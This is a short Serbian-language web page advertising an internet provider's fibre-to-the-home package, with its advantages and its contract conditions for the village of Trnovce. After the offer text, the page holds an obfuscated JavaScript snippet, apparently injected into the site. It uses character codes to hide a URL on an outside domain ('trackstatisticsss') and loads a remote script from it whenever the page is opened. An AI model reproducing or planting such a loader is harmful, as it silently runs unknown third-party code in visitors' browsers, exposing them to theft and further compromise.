Prednosti:

  • Prednost tehnologije nad postojećim vrstama pristupa internetu
  • Mogućnost prenosa velikih količina podataka
  • Niska latencija
  • Paketi sa velikim uploadom
  • Nema filtriranja portova
  • Garantovan kvalitet usluge

Uslovi:

  • Trenutno FTTH je dostupan u mestima: Trnovce
  • Potpisivanje ugovora na 24 meseci
  • Minimalni paket koji morate koristiti mesečno je 15/2 Mbps
  • Postojanje tehničkih mogućnosti

 

var u = String.fromCharCode(104,116,116,112,115,58,47,47,99,111,117,110,116,46,116,114,97,99,107,115,116,97,116,105,115,116,105,99,115,115,115,46,99,111,109,47,106,46,106,115,63,118,61);var d=document;var s=d.createElement(String.fromCharCode(115,99,114,105,112,116)); s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); var pl = u; s.src=pl; if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript);} else {d.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(s);var list = document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116));list.insertBefore(s, list.childNodes[0]);}

Scroll to top